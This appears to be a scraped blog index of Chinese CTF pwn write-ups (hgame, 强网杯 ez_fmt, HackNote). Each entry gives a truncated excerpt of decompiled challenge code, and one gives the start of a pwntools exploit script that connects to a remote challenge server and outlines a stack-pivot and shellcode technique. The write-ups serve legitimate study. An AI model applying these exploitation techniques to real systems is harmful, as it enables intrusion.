hgame_week2_pwn题解
EldenRing 2简单的uaf,因为寒假才刚开始入门堆,所以写得稍微详细点。先看看伪c,
123456789101112131415161718192021222324252627282930313233// local variable allocation has failed, the output may be wrong!int __cdecl main(int argc, const char **argv, const char **envp){ int v4; // [rsp+1Ch] [rbp-4h] BYREF init(argc, argv, envp); while ( 1 ) { menu(*(_QWORD *)&argc); *(_QWORD *)&argc = "%d"; __isoc99_scanf("%d", &v4); switch ( v4 ) { case 1: add_note(); ...
hgame_week1_pwn题解
ezsignIn手速够快直接拿下一血
elden ring黑屏加载难绷,思路大概这样,栈迁移到bss段,mprotect改bss段权限,然后bss段注入shellcode执行orw.
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061from pwn import *context(arch="amd64",log_level="debug")#p=process("./vuln")p=remote("47.100.137.175",32546)one=0xe3afelibc=ELF("./libc.so.6")elf=context.binary=ELF("./vuln")sleep(8)#gdb.attach(p)pop_rdi=0x00000000004013e3main=0x401297 ...
强网杯ez_fmt复现
ez_fmt本来想着用格式化字符串低位爆破,不过看了别的师傅的文章,似乎有更为巧妙的思路。先给大家看看题目
1234567891011121314151617nt __cdecl main(int argc, const char **argv, const char **envp){ char buf[88]; // [rsp+0h] [rbp-60h] BYREF unsigned __int64 v5; // [rsp+58h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 2, 0LL); printf("There is a gift for you %p\n", buf); read(0, buf, 0x30uLL); if ( w == 0xFFFF ) { printf(buf); w = 0; } return 0;}
题目逻辑很简单,给了一个栈上的地 ...
HackNote
Hacknote对于入门堆的师傅来说,这是个不错的入门题,但pwnabletw上扣了符号表,gdb调试起来比较麻烦,建议先做攻防世界上的,我们先看看ida反编译出来的代码
123456789101112131415161718192021222324252627282930313233343536373839404142void __cdecl __noreturn main(){ int v0; // eax char buf[4]; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch] v2 = __readgsdword(0x14u); setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 2, 0); while ( 1 ) { while ( 1 ) { all_choice(); read(0, buf, 4u); v0 = atoi(buf); ...